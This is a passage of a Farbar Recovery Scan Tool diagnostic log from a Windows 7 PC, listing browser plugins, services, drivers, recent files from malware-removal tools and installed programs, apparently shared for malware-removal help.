Tcpip\..\Interfaces\{47CED9F3-6727-4E66-BBD7-559438BB948D}: [NameServer] 167.206.245.130,167.206.245.129
 
FireFox:
========
FF Plugin: @Google.com/GoogleEarthPlugin -> C:\Program Files\Google\Google Earth\plugin\npgeplugin.dll (Google)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\4.0.50401.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @Microsoft.com/NpWinExt,version=5.0 -> C:\Program Files\MSN Toolbar\Platform\6.0.2237.0\npwinext.dll (Microsoft Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @citrixonline.com/appdetectorplugin -> C:\Users\KELI\AppData\Local\Citrix\Plugins\104\npappdetector.dll (Citrix Online)
FF HKLM\...\Firefox\Extensions: [msntoolbar@msn.com] - C:\Program Files\MSN Toolbar\Platform\6.0.2237.0\Firefox
FF Extension: Bing Bar - C:\Program Files\MSN Toolbar\Platform\6.0.2237.0\Firefox [2010-10-16]
FF HKLM\...\Firefox\Extensions: [{27182e60-b5f3-411c-b545-b44205977502}] - C:\Program Files\Microsoft\Search Enhancement Pack\Search Helper\firefoxextension\SearchHelperExtension
FF Extension: Search Helper Extension - C:\Program Files\Microsoft\Search Enhancement Pack\Search Helper\firefoxextension\SearchHelperExtension [2010-10-16]
FF HKLM\...\Firefox\Extensions: [{3252b9ae-c69a-4eaf-9502-dc9c1f6c009e}] - C:\Program Files\Microsoft\Search Enhancement Pack\Default Manager\DMExtension
FF Extension: Default Manager - C:\Program Files\Microsoft\Search Enhancement Pack\Default Manager\DMExtension [2010-10-16]
 
Chrome: 
=======
CHR HomePage: Default -> hxxp://www.google.com/
CHR StartupUrls: Default -> "hxxp://www.google.com/"
CHR Plugin: (Shockwave Flash) - C:\Program Files\Google\Chrome\Application\38.0.2125.111\PepperFlash\pepflashplayer.dll ()
CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Program Files\Google\Chrome\Application\38.0.2125.111\ppGoogleNaClPluginChrome.dll No File
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files\Google\Chrome\Application\38.0.2125.111\pdf.dll ()
CHR Plugin: (Adobe Acrobat) - C:\Program Files\Adobe\Reader 10.0\Reader\Browser\nppdf32.dll (Adobe Systems Inc.)
CHR Plugin: (Google Update) - C:\Program Files\Google\Update\1.3.21.123\npGoogleUpdate3.dll No File
CHR Plugin: (Bing Bar) - C:\Program Files\MSN Toolbar\Platform\6.0.2237.0\npwinext.dll (Microsoft Corporation)
CHR Plugin: (Silverlight Plug-In) - c:\Program Files\Microsoft Silverlight\4.0.50401.0\npctrl.dll ( Microsoft Corporation)
CHR Profile: C:\Users\KELI\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\KELI\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-07-18]
CHR Extension: (Google Wallet) - C:\Users\KELI\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-04-01]
 
========================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 EngineServer; C:\Program Files\McAfee\Managed VirusScan\VScan\EngineServer.exe [14144 2009-06-02] (McAfee, Inc.)
S2 HP Support Assistant Service; C:\Program Files\Hewlett-Packard\HP Support Framework\hpsa_service.exe [92160 2013-11-04] (Hewlett-Packard Company) [File not signed]
S4 McShield; C:\Program Files\McAfee\Managed VirusScan\VScan\McShield.exe [144704 2009-06-02] (McAfee, Inc.)
S4 myAgtSvc; C:\Program Files\McAfee\Managed VirusScan\Agent\myAgtSvc.Exe [221024 2009-11-17] (McAfee, Inc.)
R2 pdfcDispatcher; C:\Program Files\PDF Complete\pdfsvc.exe [635416 2009-06-18] (PDF Complete Inc)
R2 SiteAdvisor Service; C:\Program Files\SiteAdvisor\6173\SAService.exe [341280 2010-10-16] ()
R2 UNS; C:\Program Files\Common Files\Intel\Privacy Icon\UNS\UNS.exe [2066968 2009-07-24] (Intel Corporation)
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [114904 2014-10-27] (Malwarebytes Corporation)
S3 MfeAVFK; C:\Windows\System32\drivers\MfeAVFK.sys [79816 2009-05-15] (McAfee, Inc.)
S3 MfeBOPK; C:\Windows\System32\drivers\MfeBOPK.sys [35272 2009-05-15] (McAfee, Inc.)
R1 mfehidk; C:\Windows\System32\drivers\mfehidk.sys [214024 2009-05-15] (McAfee, Inc.)
S3 MfeRKDK; C:\Windows\System32\drivers\MfeRKDK.sys [34248 2009-05-15] (McAfee, Inc.)
R1 mfetdik; C:\Windows\System32\drivers\mfetdik.sys [55336 2009-05-15] (McAfee, Inc.)
R3 vpcbus; C:\Windows\System32\DRIVERS\vpchbus.sys [172416 2010-11-20] (Microsoft Corporation)
R1 vpcnfltr; C:\Windows\System32\DRIVERS\vpcnfltr.sys [48128 2010-11-20] (Microsoft Corporation)
R3 vpcusb; C:\Windows\System32\DRIVERS\vpcusb.sys [78336 2010-11-20] (Microsoft Corporation)
R1 vpcvmm; C:\Windows\System32\drivers\vpcvmm.sys [296064 2010-11-20] (Microsoft Corporation)
S3 catchme; \??\C:\Users\KELI\AppData\Local\Temp\catchme.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-11-03 16:58 - 2014-11-03 16:58 - 02347384 _____ (ESET) C:\Users\KELI\Desktop\esetsmartinstaller_enu.exe
2014-11-03 16:58 - 2014-11-03 16:58 - 00000000 ____D () C:\Program Files\ESET
2014-10-30 08:18 - 2014-10-30 08:18 - 04181856 _____ (Kaspersky Lab ZAO) C:\Users\KELI\Downloads\tdsskiller (2).exe
2014-10-30 08:18 - 2014-10-30 08:18 - 04181856 _____ (Kaspersky Lab ZAO) C:\Users\KELI\Desktop\tdsskillerx.exe
2014-10-30 08:18 - 2014-10-28 08:24 - 04181856 _____ (Kaspersky Lab ZAO) C:\Users\KELI\Desktop\tdsskiller.exe
2014-10-30 08:15 - 2014-11-06 08:38 - 00000000 ____D () C:\Users\KELI\Desktop\FRST-OlderVersion
2014-10-30 08:14 - 2014-10-30 08:14 - 00000619 _____ () C:\Users\KELI\Documents\fixlist.txt
2014-10-28 08:58 - 2014-10-28 08:58 - 00047174 _____ () C:\ComboFix.txt
2014-10-28 08:48 - 2014-10-28 08:58 - 00000000 ____D () C:\Qoobox
2014-10-28 08:48 - 2011-06-26 01:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-10-28 08:48 - 2010-11-07 12:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-10-28 08:48 - 2009-04-19 23:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-10-28 08:48 - 2000-08-30 19:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-10-28 08:48 - 2000-08-30 19:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-10-28 08:48 - 2000-08-30 19:00 - 00098816 _____ () C:\Windows\sed.exe
2014-10-28 08:48 - 2000-08-30 19:00 - 00080412 _____ () C:\Windows\grep.exe
2014-10-28 08:48 - 2000-08-30 19:00 - 00068096 _____ () C:\Windows\zip.exe
2014-10-28 08:46 - 2014-10-28 08:48 - 01998336 _____ () C:\Users\KELI\Downloads\AdwCleaner.exe
2014-10-28 08:45 - 2014-10-28 08:44 - 05591695 ____R (Swearware) C:\Users\KELI\Desktop\ComboFix.exe
2014-10-28 08:43 - 2014-10-28 08:44 - 05591695 _____ (Swearware) C:\Users\KELI\Downloads\ComboFix.exe
2014-10-28 08:24 - 2014-10-28 08:24 - 04181856 _____ (Kaspersky Lab ZAO) C:\Users\KELI\Downloads\tdsskiller (1).exe
2014-10-28 08:23 - 2014-10-28 08:24 - 04181856 _____ (Kaspersky Lab ZAO) C:\Users\KELI\Downloads\tdsskiller.exe
2014-10-27 16:24 - 2014-10-27 16:24 - 00003189 _____ () C:\Users\KELI\Desktop\Sophos Virus Removal Tool.lnk
2014-10-27 16:24 - 2014-10-27 16:24 - 00000000 ____D () C:\Users\KELI\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Sophos
2014-10-27 16:24 - 2014-10-27 16:24 - 00000000 ____D () C:\ProgramData\Sophos
2014-10-27 16:24 - 2014-10-27 16:24 - 00000000 ____D () C:\Program Files\Sophos
2014-10-27 16:18 - 2014-10-27 16:19 - 00000000 ____D () C:\NPE
2014-10-27 15:54 - 2014-10-27 16:21 - 00000000 ____D () C:\Users\KELI\AppData\Local\NPE
2014-10-27 15:54 - 2014-10-27 15:54 - 00000000 ____D () C:\ProgramData\Norton
2014-10-27 15:53 - 2014-10-27 15:56 - 103020744 _____ (Sophos Limited) C:\Users\KELI\Downloads\Sophos Virus Removal Tool.exe
2014-10-27 15:52 - 2014-10-27 15:53 - 03060320 ____N (Symantec Corporation) C:\Users\KELI\Downloads\NPE.exe
2014-10-27 15:16 - 2014-10-28 08:45 - 00000000 ____D () C:\Windows\erdnt
2014-10-27 15:12 - 2014-10-30 08:19 - 00024724 _____ () C:\Users\KELI\Desktop\Addition.txt
2014-10-27 15:11 - 2014-11-06 08:44 - 00013121 _____ () C:\Users\KELI\Desktop\FRST.txt
2014-10-27 15:11 - 2014-11-06 08:44 - 00000000 ____D () C:\FRST
2014-10-27 15:10 - 2014-10-27 15:10 - 01706144 _____ (Thisisu) C:\Users\KELI\Downloads\JRT.exe
2014-10-27 15:10 - 2014-10-27 15:10 - 01706144 _____ (Thisisu) C:\Users\KELI\Downloads\JRT (1).exe
2014-10-27 15:07 - 2014-11-06 08:38 - 01106432 _____ (Farbar) C:\Users\KELI\Desktop\FRST.exe
2014-10-27 15:07 - 2014-10-27 15:07 - 01104896 _____ (Farbar) C:\Users\KELI\Downloads\FRST.exe
2014-10-27 14:28 - 2014-10-27 15:41 - 00114904 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-27 14:28 - 2014-10-27 14:29 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-27 14:28 - 2014-10-27 14:29 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-10-27 14:28 - 2014-10-27 14:28 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-10-27 14:28 - 2014-10-01 10:11 - 00075480 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-10-27 14:28 - 2014-10-01 10:11 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-10-27 14:28 - 2014-10-01 10:11 - 00023256 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-10-15 12:57 - 2014-10-09 20:44 - 00396288 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-10-15 12:57 - 2014-10-09 20:44 - 00230912 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2014-10-15 12:57 - 2014-10-09 20:39 - 00302592 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-10-15 12:57 - 2014-10-06 21:04 - 00331448 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-10-15 12:57 - 2014-09-28 19:41 - 02379264 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-10-15 12:57 - 2014-09-25 17:46 - 00365056 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-10-15 12:57 - 2014-09-25 17:46 - 00243200 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-10-15 12:57 - 2014-09-25 17:46 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-10-15 12:57 - 2014-09-25 17:43 - 11807232 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-10-15 12:57 - 2014-09-25 17:32 - 02017280 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-10-15 12:57 - 2014-09-18 20:44 - 17484800 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-10-15 12:57 - 2014-09-18 20:25 - 04201472 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-10-15 12:57 - 2014-09-18 20:14 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-10-15 12:57 - 2014-09-18 20:14 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-10-15 12:57 - 2014-09-18 20:02 - 00454656 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-10-15 12:57 - 2014-09-18 20:01 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-10-15 12:57 - 2014-09-18 20:01 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-10-15 12:57 - 2014-09-18 19:59 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-10-15 12:57 - 2014-09-18 19:55 - 02187264 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-10-15 12:57 - 2014-09-18 19:54 - 00043008 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-10-15 12:57 - 2014-09-18 19:53 - 00032768 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-10-15 12:57 - 2014-09-18 19:51 - 00440320 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-10-15 12:57 - 2014-09-18 19:50 - 00112128 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-10-15 12:57 - 2014-09-18 19:50 - 00108032 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-10-15 12:57 - 2014-09-18 19:49 - 00597504 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-10-15 12:57 - 2014-09-18 19:44 - 00646144 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-10-15 12:57 - 2014-09-18 19:36 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-10-15 12:57 - 2014-09-18 19:32 - 00164864 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-10-15 12:57 - 2014-09-18 19:20 - 00677888 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-10-15 12:57 - 2014-09-18 19:20 - 00607744 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-10-15 12:57 - 2014-09-18 19:18 - 01068032 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-10-15 12:57 - 2014-09-18 18:59 - 01810944 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-10-15 12:57 - 2014-09-18 18:53 - 01190400 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-10-15 12:57 - 2014-09-18 18:52 - 00678400 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-10-15 12:57 - 2014-09-04 00:04 - 00372736 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll
2014-10-15 12:57 - 2014-06-18 17:23 - 01131664 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll
2014-10-15 12:57 - 2014-06-18 17:23 - 00156824 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll
2014-10-15 12:57 - 2014-06-18 17:23 - 00081560 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll
2014-10-15 12:56 - 2014-09-17 20:32 - 02363904 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2014-10-15 12:56 - 2014-09-12 20:40 - 00067072 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-10-15 12:56 - 2014-08-18 21:41 - 00050688 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2014-10-15 12:56 - 2014-08-18 21:41 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2014-10-15 12:56 - 2014-08-18 21:41 - 00027648 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2014-10-15 12:56 - 2014-08-18 21:40 - 00096768 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2014-10-15 12:56 - 2014-08-18 21:40 - 00016896 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2014-10-15 12:56 - 2014-08-18 20:48 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2014-10-15 12:56 - 2014-07-16 20:40 - 00157696 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll
2014-10-15 12:56 - 2014-07-16 20:39 - 03221504 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2014-10-15 12:56 - 2014-07-16 20:39 - 01051136 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe
2014-10-15 12:56 - 2014-07-16 20:39 - 00523264 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll
2014-10-15 12:56 - 2014-07-16 20:39 - 00304128 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2014-10-15 12:56 - 2014-07-16 20:39 - 00131584 _____ (Microsoft Corporation) C:\Windows\system32\aaclient.dll
2014-10-15 12:56 - 2014-07-16 20:39 - 00130048 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll
2014-10-15 12:56 - 2014-07-16 20:39 - 00065536 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2014-10-15 12:56 - 2014-07-16 20:39 - 00017408 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2014-10-15 12:56 - 2014-07-16 20:03 - 00184320 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys
2014-10-15 12:56 - 2014-07-16 20:02 - 00031232 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys
2014-10-15 12:56 - 2014-07-06 20:40 - 11411456 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll
2014-10-15 12:56 - 2014-07-06 20:40 - 03208704 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2014-10-15 12:56 - 2014-07-06 20:40 - 01329664 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2014-10-15 12:56 - 2014-07-06 20:40 - 01174528 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2014-10-15 12:56 - 2014-07-06 20:40 - 01005056 _____ (Microsoft Corporation) C:\Windows\system32\cryptui.dll
2014-10-15 12:56 - 2014-07-06 20:40 - 00988160 _____ (Microsoft Corporation) C:\Windows\system32\drmv2clt.dll
2014-10-15 12:56 - 2014-07-06 20:40 - 00744960 _____ (Microsoft Corporation) C:\Windows\system32\blackbox.dll
2014-10-15 12:56 - 2014-07-06 20:40 - 00617984 _____ (Microsoft Corporation) C:\Windows\system32\wmdrmsdk.dll
2014-10-15 12:56 - 2014-07-06 20:40 - 00504320 _____ (Microsoft Corporation) C:\Windows\system32\msscp.dll
2014-10-15 12:56 - 2014-07-06 20:40 - 00489984 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll
2014-10-15 12:56 - 2014-07-06 20:40 - 00473600 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2014-10-15 12:56 - 2014-07-06 20:40 - 00442880 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll
2014-10-15 12:56 - 2014-07-06 20:40 - 00406016 _____ (Microsoft Corporation) C:\Windows\system32\drmmgrtn.dll
2014-10-15 12:56 - 2014-07-06 20:40 - 00374784 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll
2014-10-15 12:56 - 2014-07-06 20:40 - 00354816 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll
2014-10-15 12:56 - 2014-07-06 20:40 - 00275968 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll
2014-10-15 12:56 - 2014-07-06 20:40 - 00265216 _____ (Microsoft Corporation) C:\Windows\system32\msnetobj.dll
2014-10-15 12:56 - 2014-07-06 20:40 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll
2014-10-15 12:56 - 2014-07-06 20:40 - 00179200 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2014-10-15 12:56 - 2014-07-06 20:40 - 00157184 _____ (Microsoft Corporation) C:\Windows\system32\pcasvc.dll
2014-10-15 12:56 - 2014-07-06 20:40 - 00143872 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2014-10-15 12:56 - 2014-07-06 20:40 - 00103424 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll
2014-10-15 12:56 - 2014-07-06 20:40 - 00081408 _____ (Microsoft Corporation) C:\Windows\system32\cryptsp.dll
2014-10-15 12:56 - 2014-07-06 20:40 - 00008192 _____ (Microsoft Corporation) C:\Windows\system32\spwmp.dll
2014-10-15 12:56 - 2014-07-06 20:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\msdxm.ocx
2014-10-15 12:56 - 2014-07-06 20:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\dxmasf.dll
2014-10-15 12:56 - 2014-07-06 20:39 - 12625408 _____ (Microsoft Corporation) C:\Windows\system32\wmploc.DLL
2014-10-15 12:56 - 2014-07-06 20:39 - 03970488 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlpa.exe
2014-10-15 12:56 - 2014-07-06 20:39 - 03914680 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2014-10-15 12:56 - 2014-07-06 20:39 - 00100864 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe
2014-10-15 12:56 - 2014-07-06 20:39 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\rrinstaller.exe
2014-10-15 12:56 - 2014-07-06 20:39 - 00023040 _____ (Microsoft Corporation) C:\Windows\system32\mfpmp.exe
2014-10-15 12:56 - 2014-07-06 20:37 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\mferror.dll
2014-10-15 12:56 - 2014-07-06 20:28 - 00593920 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\PEAuth.sys
2014-10-15 12:56 - 2014-06-27 19:21 - 00521384 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2014-10-15 12:56 - 2014-06-27 19:21 - 00455752 _____ (Microsoft Corporation) C:\Windows\system32\winresume.exe
2014-10-15 12:56 - 2014-06-27 19:21 - 00409272 _____ (Microsoft Corporation) C:\Windows\system32\ci.dll
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-11-06 08:43 - 2012-05-01 09:33 - 00000000 ___RD () C:\Users\KELI\Dropbox
2014-11-06 08:43 - 2012-05-01 09:32 - 00000000 ____D () C:\Users\KELI\AppData\Roaming\Dropbox
2014-11-06 08:42 - 2014-06-04 09:57 - 00000556 _____ () C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-3621039740-3434257137-3815352865-1001.job
2014-11-06 08:42 - 2011-03-21 10:19 - 00000882 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-11-06 08:42 - 2010-12-29 17:48 - 00075488 _____ () C:\Windows\PFRO.log
2014-11-06 08:42 - 2010-10-16 11:07 - 01861574 _____ () C:\Windows\WindowsUpdate.log
2014-11-06 08:42 - 2009-07-13 23:53 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-11-06 08:42 - 2009-07-13 23:39 - 00093631 _____ () C:\Windows\setupact.log
2014-11-06 08:42 - 2009-07-13 23:34 - 00021680 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-11-06 08:42 - 2009-07-13 23:34 - 00021680 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-11-05 16:54 - 2010-12-29 17:49 - 00000000 ____D () C:\Scans
2014-11-05 16:30 - 2011-03-21 10:19 - 00000886 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-11-05 16:16 - 2012-04-03 08:22 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-11-05 09:13 - 2009-07-25 07:54 - 00782510 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-11-05 09:09 - 2010-10-16 11:11 - 00000000 ____D () C:\ProgramData\PDFC
2014-11-04 09:28 - 2012-01-10 09:25 - 00000316 _____ () C:\Windows\Tasks\HPCeeScheduleForKELI.job
2014-10-30 13:11 - 2009-07-13 23:52 - 00000000 ____D () C:\Windows\system32\FxsTmp
2014-10-28 08:57 - 2009-07-13 21:04 - 00000215 _____ () C:\Windows\system.ini
2014-10-28 08:38 - 2012-08-29 08:07 - 00002131 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-10-28 06:35 - 2011-03-21 10:46 - 00229000 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2014-10-27 15:37 - 2009-07-13 21:37 - 00000000 ___RD () C:\Users\Public
2014-10-27 14:49 - 2014-06-04 09:56 - 00000000 ____D () C:\Users\KELI\AppData\Local\Citrix
2014-10-16 09:24 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\rescache
2014-10-16 08:58 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\Microsoft.NET
2014-10-16 08:27 - 2012-01-17 09:31 - 00000000 _____ () C:\Windows\system32\HP_ActiveX_Patch_NOT_DETECTED.txt
2014-10-16 08:27 - 2011-04-12 08:27 - 00000052 _____ () C:\Windows\system32\DOErrors.log
2014-10-16 08:13 - 2009-07-13 23:33 - 00401032 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-10-16 08:12 - 2014-05-06 15:59 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-10-15 15:55 - 2013-08-14 16:10 - 00000000 ____D () C:\Windows\system32\MRT
2014-10-15 15:52 - 2011-03-21 08:13 - 100290944 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
 
Some content of TEMP:
====================
C:\Users\KELI\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpz1liyd.dll
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-11-05 11:22
 
==================== End Of Log ============================

ADDITION.TXT:

 

Additional scan result of Farbar Recovery Scan Tool (x86) Version: 04-11-2014
Ran by KELI at 2014-11-06 08:44:56
Running from C:\Users\KELI\Desktop
Boot Mode: Normal
==========================================================
 
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: McAfee® Total Protection™ for Small Business (Disabled - Out of date) {86355677-4064-3EA7-ABB3-1B136EB04637}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: McAfee® Total Protection™ for Small Business (Disabled - Out of date) {3D54B793-665E-3129-9103-206115370C8A}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
Adobe AIR (HKLM\...\Adobe AIR) (Version: 2.6.0.19140 - Adobe Systems Incorporated)
Adobe Flash Player 15 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)
Adobe Reader X (10.1.10) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.10 - Adobe Systems Incorporated)
Bing Bar (HKLM\...\{08234a0d-cf39-4dca-99f0-0c5cb496da81}) (Version: 6.0.2237.0 - Microsoft Corporation)
Bing Bar Platform (Version: 6.0.2237.0 - Microsoft Corporation) Hidden
Bing Rewards Client Installer (Version: 16.0.345.0 - Microsoft Corporation) Hidden
Citrix Online Launcher (HKLM\...\{F17C3DC2-2ACA-4B0E-BDBF-ACE61B14E7CD}) (Version: 1.0.183 - Citrix)
Dropbox (HKCU\...\Dropbox) (Version: 2.10.30 - Dropbox, Inc.)
ESET Online Scanner v3 (HKLM\...\ESET Online Scanner) (Version:  - )
Google Chrome (HKLM\...\Google Chrome) (Version: 38.0.2125.111 - Google Inc.)
Google Earth Plug-in (HKLM\...\{4AB54F11-2F8C-11E3-B09F-B8AC6F97B88E}) (Version: 7.1.2.2041 - Google)
